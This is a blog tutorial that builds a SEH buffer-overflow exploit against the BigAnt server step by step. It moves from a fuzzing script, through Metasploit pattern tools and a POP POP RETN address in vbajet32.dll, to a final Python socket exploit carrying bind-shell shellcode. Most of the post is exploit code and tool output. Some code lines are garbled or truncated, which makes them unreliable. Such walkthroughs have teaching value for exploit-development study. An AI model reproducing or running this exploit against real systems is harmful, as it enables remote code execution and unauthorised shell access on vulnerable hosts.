Jumat, 11 Januari 2013

FUZZING SEH

Now, we will try exploit BigAnt Application. Let's try it step by step..
First, prepare  the fuzzing
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

after that, run BigAnt

then, open OllyDbg and Attach BigAnt applications. Choose AntServer

Run a fuzzer. To see the results, select the tab view - SEH Chain. And The result is

in the image above, BigAnt 2500 crash with a buffer that we send. The results are shown with the number 41 as shown above.

Next, try to make the pattern of 2500 byte through # pattern_create
root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb 2500

enter the result into the fuzzer
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV " + "\x41" * "Aa0Aa1Aa2Aa3A . ." #patter_create 2500
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_add"ress, target_port))
sock.send(buffer)
sock.close()

after that try restarting OllyDbg and BigAnt and rerun fuzzernya. So the result

after the result has been that we can, try to insert into # pattern_offset
root @ bt :/ opt/metasploit/msf3/tools #. / pattern_offset.rb 42326742
966

conclusion is that it takes the value buffer of 966 bytes for the SEH.

After we have the address that used for SEH, enter the address that has a command offset vbajet32dll POP, RETN POP into fuzzer.
To get the offset address vbajet32dll, select the tab view-executable modules - double click VBAJET32. After that, right click - search for - sequence of command. Tyep as below



and the result is

Try doing a Break Point before run fuzzer.  If the result is true

press Shift + f9 to process into memory vbajet32dl. Then press f7 to RETN command.


we need 6 springboard, while memory space that is there is only 4 bytes.
Therefore, it takes 2 bytes to achieve it. So we must modifications the fuzzer
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * (2500 - len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

do breakpoint as before, so the result is


next is to create shellcode or payload with tools # msfweb
root @ bt :/ pentest/exploits/framework2 #. / msfweb
+ ---- = [Metasploit Framework Web Interface (127.0.0.1:55555)

enter the IP address above into your browser

insert the result of Genarate Payload into the Fuzzer
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * 16
buffer+= ("\xda\xdf\x29\xc9 . .) #Bind Shell
buffer+= "\x90" * (2500 - len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

SUCCESSFULLY


GOODLUCK FOR YOUR TRY HARDER !!!

0 komentar:

Posting Komentar